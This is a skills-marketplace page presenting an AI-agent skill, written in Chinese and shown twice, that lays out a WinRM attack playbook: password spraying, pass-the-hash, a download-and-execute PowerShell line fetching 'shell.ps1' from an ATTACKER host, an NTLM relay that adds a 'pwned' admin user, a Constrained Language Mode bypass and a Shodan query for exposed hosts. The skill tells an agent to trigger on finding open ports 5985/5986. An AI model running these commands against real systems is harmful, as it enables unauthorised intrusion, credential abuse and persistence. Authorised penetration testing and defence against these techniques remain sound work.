Adoption

Agent Skills are supported by leading AI development tools.

VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory

wgpsec/winrm-pentesting

Name: winrm-pentesting
Author: wgpsec

skills/exploit/network-service/winrm-pentesting/SKILL.md

npx skillsauth add wgpsec/AboutSecurity winrm-pentesting

Clean

TrivyContainer and dependency vulnerability scanner

Clean

SemgrepStatic code analysis for vulnerabilities

Clean

mcp-scan (Snyk)Model Context Protocol security validation

Skipped

Snyk (dep)Open source security scanning

Skipped

Socket.devSupply chain security analysis

Skipped

VirusTotalMulti-engine malware detection

Skipped

CrowdStrikeAdvanced threat intelligence

Skipped

OSV-ScannerOpen Source Vulnerability database check

Skipped

OWASP Dep-Check

WinRM 渗透测试方法论 (5985/5986)

深入参考

WinRM 认证方式、Evil-WinRM 高级用法、COM 对象利用、漏洞详情 -> 读 references/winrm-techniques.md

整体决策树

发现 5985/5986 端口开放
├─ Phase 1: 服务发现
│   ├─ 确认 WinRM 可用: Test-WSMan / curl 探测
│   ├─ HTTP (5985) vs HTTPS (5986) -> 影响攻击面
│   └─ 版本与协议信息
├─ Phase 2: 凭据测试
│   ├─ 密码 -> crackmapexec / Evil-WinRM
│   ├─ NTLM 哈希 -> Pass-the-Hash (Evil-WinRM -H)
│   ├─ Kerberos 票据 -> Evil-WinRM -k
│   └─ 证书 -> Evil-WinRM --cert-pem / --key-pem
├─ Phase 3: 远程执行
│   ├─ PowerShell Remoting (Invoke-Command / Enter-PSSession)
│   ├─ Evil-WinRM 交互 shell
│   └─ WSMan.Automation COM 对象 (绕过 CLM)
├─ Phase 4: Evil-WinRM 高级功能
│   ├─ 文件上传/下载
│   ├─ 加载 .NET 程序集 (Invoke-Binary)
│   ├─ 加载 PowerShell 脚本 (-s 参数)
│   └─ Kerberos / 证书认证
├─ Phase 5: 横向移动
│   ├─ NTLM Relay -> WinRM (ntlmrelayx.py -t wsman://)
│   ├─ 从已控主机 PS-Remoting 到其他主机
│   └─ WSMan COM 横向移动 (绕过 CLM)
└─ Phase 6: 已知漏洞
    ├─ OMIGOD CVE-2021-38647 (Azure OMI unauthenticated RCE)
    ├─ NTLM Relay to WS-MAN (Impacket 0.11+)
    └─ WSMan.Automation COM 滥用

Phase 1: 服务发现

1.1 确认 WinRM 可用

# PowerShell 测试
Test-WSMan <target-ip>

# Nmap 探测
nmap -sV -p 5985,5986 <IP>

# NXC (NetExec) 快速检查
nxc winrm <IP>

1.2 端口说明

| 端口 | 协议 | 说明 | |------|------|------| | 5985 | HTTP | WinRM 默认 HTTP 端口 | | 5986 | HTTPS | WinRM 默认 HTTPS 端口 |

关键判断：

HTTP (5985) 开放 -> NTLM Relay 攻击面更大
仅 HTTPS (5986) -> 需要关注证书认证

Phase 2: 凭据测试

2.1 凭据验证与爆破

# crackmapexec / nxc — 验证凭据
crackmapexec winrm <IP> -d <Domain> -u <username> -p <password>
crackmapexec winrm <IP> -d <Domain> -u <username> -H <HASH>

# 带命令执行验证
crackmapexec winrm <IP> -d <Domain> -u <username> -p <password> -x "whoami"
crackmapexec winrm <IP> -d <Domain> -u <username> -H <HASH> -X '$PSVersionTable'

# 批量爆破
crackmapexec winrm <IP> -d <Domain> -u usernames.txt -p passwords.txt

警告: WinRM 爆破可能触发账户锁定策略，谨慎使用。

2.2 凭据测试决策树

凭据类型
├─ 明文密码
│   ├─ crackmapexec winrm <IP> -u <user> -p <pass>
│   └─ evil-winrm -i <IP> -u <user> -p <pass>
├─ NTLM 哈希
│   ├─ crackmapexec winrm <IP> -u <user> -H <hash>
│   └─ evil-winrm -i <IP> -u <user> -H <hash>
├─ Kerberos 票据
│   └─ evil-winrm -i <IP> -u <user> -k --spn HTTP/<IP>
├─ 证书 (AD CS)
│   └─ evil-winrm -i <IP> --cert-pem cert.pem --key-pem key.pem
└─ 无凭据
    └─ 爆破 -> crackmapexec winrm <IP> -u users.txt -p pass.txt

Phase 3: 远程执行

3.1 PowerShell Remoting

# 远程执行单条命令
Invoke-Command -ComputerName <target> -ScriptBlock {ipconfig /all} [-Credential DOMAIN\user]

# 执行本地函数到远程
Invoke-Command -ComputerName <target> -ScriptBlock ${function:enumeration} [-ArgumentList "args"]

# 执行脚本文件
Invoke-Command -ComputerName <target> -FilePath C:\path\to\script.ps1

# 获取交互式 PS Session
Enter-PSSession -ComputerName <target> [-Credential $creds]

# 带代理绕过的会话
Enter-PSSession -ComputerName <target> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)

3.2 凭据对象构造

$password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("DOMAIN\user", $password)

Enter-PSSession -ComputerName <target> -Credential $creds

3.3 反弹 Shell

Invoke-Command -ComputerName <target> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://ATTACKER:8080/shell.ps1')"}

Phase 4: Evil-WinRM 高级功能

4.1 基本连接

# 密码认证
evil-winrm -i <IP> -u <username> -p <password>

# Pass-the-Hash
evil-winrm -i <IP> -u <username> -H <hash>

# Kerberos 认证 (v3.x)
evil-winrm -i <IP> -u <user> -k --spn HTTP/<IP>

# 证书认证 (v3.x)
evil-winrm -i <IP> --cert-pem cert.pem --key-pem key.pem

4.2 高级功能

# 加载 PowerShell 脚本目录
evil-winrm -i <IP> -u <user> -p <pass> -s /path/to/scripts/
# 在 shell 中: menu -> Invoke-Script.ps1

# 加载 .NET 可执行文件
evil-winrm -i <IP> -u <user> -p <pass> -e /path/to/binaries/
# 在 shell 中: menu -> Invoke-Binary SharpHound.exe

# 文件上传/下载
upload /local/path /remote/path
download C:\remote\path /local/path

# 会话日志
evil-winrm -i <IP> -u <user> -p <pass> -L

Phase 5: 横向移动

5.1 NTLM Relay to WinRM

当目标在 HTTP (5985) 上暴露 WinRM 时，可通过 NTLM 中继获取 SYSTEM 级命令执行。

# Impacket 0.11+ (2023)
sudo ntlmrelayx.py -t wsman://10.0.0.25 --no-smb-server -smb2support \
                   --command "net user pwned P@ssw0rd! /add"

5.2 WSMan.Automation COM 横向移动

在 Constrained Language Mode (CLM) 下绕过 PowerShell 限制：

$ws = New-Object -ComObject 'WSMan.Automation'
$session = $ws.CreateSession('http://srv01:5985/wsman',0,$null)
$cmdId = $session.Command('cmd.exe',@('/c','whoami'))
$session.Signal($cmdId,0)

5.3 PS Session 保存与复用

# 保存会话到变量
$sess = New-PSSession -ComputerName <target> [-Credential $creds]
Enter-PSSession -Session $sess

# 后台会话
Exit-PSSession

# 在会话中加载脚本
Invoke-Command -FilePath C:\path\to\script.ps1 -Session $sess

Phase 6: 已知漏洞

6.1 漏洞检测决策树

WinRM 环境分析
├─ Azure Linux VM (OMI 端口 5985/5986)
│   └─ CVE-2021-38647 (OMIGOD) — OMI < 1.6.8-1 未认证 RCE (root)
│       ├─ 检测: curl http://target:5985/wsman -H 'Content-Type:text/xml'
│       └─ 修复: 升级 OMI >= 1.6.8-1 / 防火墙封锁端口
├─ HTTP (5985) 暴露
│   └─ NTLM Relay 到 WS-MAN
│       ├─ 结合 mitm6 / Responder 捕获 NTLM
│       └─ ntlmrelayx -t wsman://target
├─ Constrained Language Mode 环境
│   └─ WSMan.Automation COM 滥用绕过
└─ 配置审计
    ├─ EnableCompatibilityHttpListener = true -> Relay 风险
    └─ AllowUnencrypted = true -> 凭据明文传输

配置与防御检查

获取访问后检查 WinRM 配置：

# 检查 WinRM 配置
winrm get winrm/config
winrm get winrm/config/service

# 关键配置项
# AllowUnencrypted: 是否允许明文传输
# EnableCompatibilityHttpListener: HTTP 兼容监听器
# TrustedHosts: 受信主机列表

| 配置项 | 风险说明 | |-------|---------| | AllowUnencrypted = true | 凭据明文传输 | | EnableCompatibilityHttpListener = true | 扩大 Relay 攻击面 | | TrustedHosts = * | 允许任意主机连接 | | 未启用 EPA (Extended Protection) | NTLM Relay 可行 |

替代工具

| 工具 | 用途 | |------|------| | Evil-WinRM | 最常用 WinRM shell (Ruby) | | pypsrp | Python WinRM/PS-Remoting (支持 CredSSP/Kerberos) | | SharpWSManWinRM | .NET WSMan COM 横向移动 | | PS-Docker | docker run -it quickbreach/powershell-ntlm 快速 PS 环境 |

Shodan 搜索

port:5985 Microsoft-HTTPAPI

wgpsec/winrm-pentesting

skills/exploit/network-service/winrm-pentesting/SKILL.md

WinRM 服务（5985/5986 端口）渗透测试方法论。涵盖 WinRM 服务发现、凭据测试（密码/哈希/Kerberos票据）、远程命令执行、Evil-WinRM 使用、横向移动。当 Agent 扫描发现 5985 或 5986 端口开放、需要测试 WinRM 认证、执行远程命令、或进行 Windows 横向移动时，触发此 Skill。

1,185 stars

testing

Updated Apr 24, 2026

$ install --global

skillsauth

npx skillsauth add wgpsec/AboutSecurity winrm-pentesting

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

Security Scan Results

3 of 9 scanners reported clean

Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

Scanners Passed

Scanners in report

Clean

TrivyContainer and dependency vulnerability scanner

95%

Clean

SemgrepStatic code analysis for vulnerabilities

95%

Clean

mcp-scan (Snyk)Model Context Protocol security validation

95%

Skipped

Snyk (dep)Open source security scanning

50%

Skipped

Socket.devSupply chain security analysis

50%

Skipped

VirusTotalMulti-engine malware detection

50%

Skipped

CrowdStrikeAdvanced threat intelligence

50%

Skipped

OSV-ScannerOpen Source Vulnerability database check

50%

Skipped

OWASP Dep-Check

50%

Last scanned: Apr 24, 2026, 5:44 AM72.2s2 files scanned

SKILL.md

name:: winrm-pentesting
description:: |
category:: exploit/network-service

WinRM 渗透测试方法论 (5985/5986)

深入参考

WinRM 认证方式、Evil-WinRM 高级用法、COM 对象利用、漏洞详情 -> 读 references/winrm-techniques.md

整体决策树

发现 5985/5986 端口开放
├─ Phase 1: 服务发现
│   ├─ 确认 WinRM 可用: Test-WSMan / curl 探测
│   ├─ HTTP (5985) vs HTTPS (5986) -> 影响攻击面
│   └─ 版本与协议信息
├─ Phase 2: 凭据测试
│   ├─ 密码 -> crackmapexec / Evil-WinRM
│   ├─ NTLM 哈希 -> Pass-the-Hash (Evil-WinRM -H)
│   ├─ Kerberos 票据 -> Evil-WinRM -k
│   └─ 证书 -> Evil-WinRM --cert-pem / --key-pem
├─ Phase 3: 远程执行
│   ├─ PowerShell Remoting (Invoke-Command / Enter-PSSession)
│   ├─ Evil-WinRM 交互 shell
│   └─ WSMan.Automation COM 对象 (绕过 CLM)
├─ Phase 4: Evil-WinRM 高级功能
│   ├─ 文件上传/下载
│   ├─ 加载 .NET 程序集 (Invoke-Binary)
│   ├─ 加载 PowerShell 脚本 (-s 参数)
│   └─ Kerberos / 证书认证
├─ Phase 5: 横向移动
│   ├─ NTLM Relay -> WinRM (ntlmrelayx.py -t wsman://)
│   ├─ 从已控主机 PS-Remoting 到其他主机
│   └─ WSMan COM 横向移动 (绕过 CLM)
└─ Phase 6: 已知漏洞
    ├─ OMIGOD CVE-2021-38647 (Azure OMI unauthenticated RCE)
    ├─ NTLM Relay to WS-MAN (Impacket 0.11+)
    └─ WSMan.Automation COM 滥用

Phase 1: 服务发现

1.1 确认 WinRM 可用

# PowerShell 测试
Test-WSMan <target-ip>

# Nmap 探测
nmap -sV -p 5985,5986 <IP>

# NXC (NetExec) 快速检查
nxc winrm <IP>

1.2 端口说明

| 端口 | 协议 | 说明 | |------|------|------| | 5985 | HTTP | WinRM 默认 HTTP 端口 | | 5986 | HTTPS | WinRM 默认 HTTPS 端口 |

关键判断：

HTTP (5985) 开放 -> NTLM Relay 攻击面更大
仅 HTTPS (5986) -> 需要关注证书认证

Phase 2: 凭据测试

2.1 凭据验证与爆破

# crackmapexec / nxc — 验证凭据
crackmapexec winrm <IP> -d <Domain> -u <username> -p <password>
crackmapexec winrm <IP> -d <Domain> -u <username> -H <HASH>

# 带命令执行验证
crackmapexec winrm <IP> -d <Domain> -u <username> -p <password> -x "whoami"
crackmapexec winrm <IP> -d <Domain> -u <username> -H <HASH> -X '$PSVersionTable'

# 批量爆破
crackmapexec winrm <IP> -d <Domain> -u usernames.txt -p passwords.txt

警告: WinRM 爆破可能触发账户锁定策略，谨慎使用。

2.2 凭据测试决策树

凭据类型
├─ 明文密码
│   ├─ crackmapexec winrm <IP> -u <user> -p <pass>
│   └─ evil-winrm -i <IP> -u <user> -p <pass>
├─ NTLM 哈希
│   ├─ crackmapexec winrm <IP> -u <user> -H <hash>
│   └─ evil-winrm -i <IP> -u <user> -H <hash>
├─ Kerberos 票据
│   └─ evil-winrm -i <IP> -u <user> -k --spn HTTP/<IP>
├─ 证书 (AD CS)
│   └─ evil-winrm -i <IP> --cert-pem cert.pem --key-pem key.pem
└─ 无凭据
    └─ 爆破 -> crackmapexec winrm <IP> -u users.txt -p pass.txt

Phase 3: 远程执行

3.1 PowerShell Remoting

# 远程执行单条命令
Invoke-Command -ComputerName <target> -ScriptBlock {ipconfig /all} [-Credential DOMAIN\user]

# 执行本地函数到远程
Invoke-Command -ComputerName <target> -ScriptBlock ${function:enumeration} [-ArgumentList "args"]

# 执行脚本文件
Invoke-Command -ComputerName <target> -FilePath C:\path\to\script.ps1

# 获取交互式 PS Session
Enter-PSSession -ComputerName <target> [-Credential $creds]

# 带代理绕过的会话
Enter-PSSession -ComputerName <target> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)

3.2 凭据对象构造

$password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("DOMAIN\user", $password)

Enter-PSSession -ComputerName <target> -Credential $creds

3.3 反弹 Shell

Invoke-Command -ComputerName <target> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://ATTACKER:8080/shell.ps1')"}

Phase 4: Evil-WinRM 高级功能

4.1 基本连接

# 密码认证
evil-winrm -i <IP> -u <username> -p <password>

# Pass-the-Hash
evil-winrm -i <IP> -u <username> -H <hash>

# Kerberos 认证 (v3.x)
evil-winrm -i <IP> -u <user> -k --spn HTTP/<IP>

# 证书认证 (v3.x)
evil-winrm -i <IP> --cert-pem cert.pem --key-pem key.pem

4.2 高级功能

# 加载 PowerShell 脚本目录
evil-winrm -i <IP> -u <user> -p <pass> -s /path/to/scripts/
# 在 shell 中: menu -> Invoke-Script.ps1

# 加载 .NET 可执行文件
evil-winrm -i <IP> -u <user> -p <pass> -e /path/to/binaries/
# 在 shell 中: menu -> Invoke-Binary SharpHound.exe

# 文件上传/下载
upload /local/path /remote/path
download C:\remote\path /local/path

# 会话日志
evil-winrm -i <IP> -u <user> -p <pass> -L

Phase 5: 横向移动

5.1 NTLM Relay to WinRM

当目标在 HTTP (5985) 上暴露 WinRM 时，可通过 NTLM 中继获取 SYSTEM 级命令执行。

# Impacket 0.11+ (2023)
sudo ntlmrelayx.py -t wsman://10.0.0.25 --no-smb-server -smb2support \
                   --command "net user pwned P@ssw0rd! /add"

5.2 WSMan.Automation COM 横向移动

在 Constrained Language Mode (CLM) 下绕过 PowerShell 限制：

$ws = New-Object -ComObject 'WSMan.Automation'
$session = $ws.CreateSession('http://srv01:5985/wsman',0,$null)
$cmdId = $session.Command('cmd.exe',@('/c','whoami'))
$session.Signal($cmdId,0)

5.3 PS Session 保存与复用

# 保存会话到变量
$sess = New-PSSession -ComputerName <target> [-Credential $creds]
Enter-PSSession -Session $sess

# 后台会话
Exit-PSSession

# 在会话中加载脚本
Invoke-Command -FilePath C:\path\to\script.ps1 -Session $sess

Phase 6: 已知漏洞

6.1 漏洞检测决策树

WinRM 环境分析
├─ Azure Linux VM (OMI 端口 5985/5986)
│   └─ CVE-2021-38647 (OMIGOD) — OMI < 1.6.8-1 未认证 RCE (root)
│       ├─ 检测: curl http://target:5985/wsman -H 'Content-Type:text/xml'
│       └─ 修复: 升级 OMI >= 1.6.8-1 / 防火墙封锁端口
├─ HTTP (5985) 暴露
│   └─ NTLM Relay 到 WS-MAN
│       ├─ 结合 mitm6 / Responder 捕获 NTLM
│       └─ ntlmrelayx -t wsman://target
├─ Constrained Language Mode 环境
│   └─ WSMan.Automation COM 滥用绕过
└─ 配置审计
    ├─ EnableCompatibilityHttpListener = true -> Relay 风险
    └─ AllowUnencrypted = true -> 凭据明文传输

配置与防御检查

获取访问后检查 WinRM 配置：

# 检查 WinRM 配置
winrm get winrm/config
winrm get winrm/config/service

# 关键配置项
# AllowUnencrypted: 是否允许明文传输
# EnableCompatibilityHttpListener: HTTP 兼容监听器
# TrustedHosts: 受信主机列表

替代工具

Shodan 搜索

port:5985 Microsoft-HTTPAPI

Related Skills

wgpsec/azure-pentesting

testing

VerifiedTrustedCommunity

Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产（Blob Storage/App Service/Azure VM/Azure Functions）、获取 Azure 凭据（Service Principal/Managed Identity/Access Token）、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面

1,393SKILL.mdUpdated Apr 24, 2026

wgpsec/azure-pentesting

wgpsec/mythic-c2

tools

VerifiedTrustedCommunity

Mythic C2 操作方法论。当需要部署 Mythic、选择 Mythic Agent、安装 C2 Profile、配置 HTTP/DNS/WebSocket/SMB/TCP 通信、生成 payload、管理回连任务，或把 Mythic 作为跨平台 C2 框架用于授权红队演练时使用。覆盖 mythic-cli 安装、Agent/Profile 选择、SSL 证书配置、payload 构建和基础 OPSEC 判断

1,345SKILL.mdUpdated May 22, 2026

wgpsec/docker-pentesting

development

VerifiedTrustedCommunity

Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能

1,345SKILL.mdUpdated May 22, 2026

wgpsec/docker-pentesting

wgpsec/padbuster-padding-oracle

development

VerifiedTrustedCommunity

使用 PadBuster 进行 Padding Oracle 攻击。当发现 Web 应用使用 CBC 模式加密且存在 Padding Oracle 漏洞时使用。PadBuster 可自动解密密文和伪造任意明文对应的合法密文，适用于加密 Cookie/Token/URL 参数。任何涉及 Padding Oracle 攻击、CBC 密文解密、Cookie 伪造的场景都应使用此技能

1,345SKILL.mdUpdated May 6, 2026

wgpsec/padbuster-padding-oracle

Download

For Claude Desktop. Download once, then upload the file in the app — no terminal needed.

Need help? View full Cowork setup guide →

Install manually

Choose your platform

# Clone the repo
git clone https://github.com/wgpsec/AboutSecurity.git

# Copy into Claude Code skills folder (global)
cp -r AboutSecurity/skills/exploit/network-service/winrm-pentesting ~/.claude/skills/

Claude Code Skills — official skills path docs.

Repository

wgpsec/AboutSecurity

1,185 stars

Compatible with

Claude Code

OpenAI Codex CLI

ChatGPT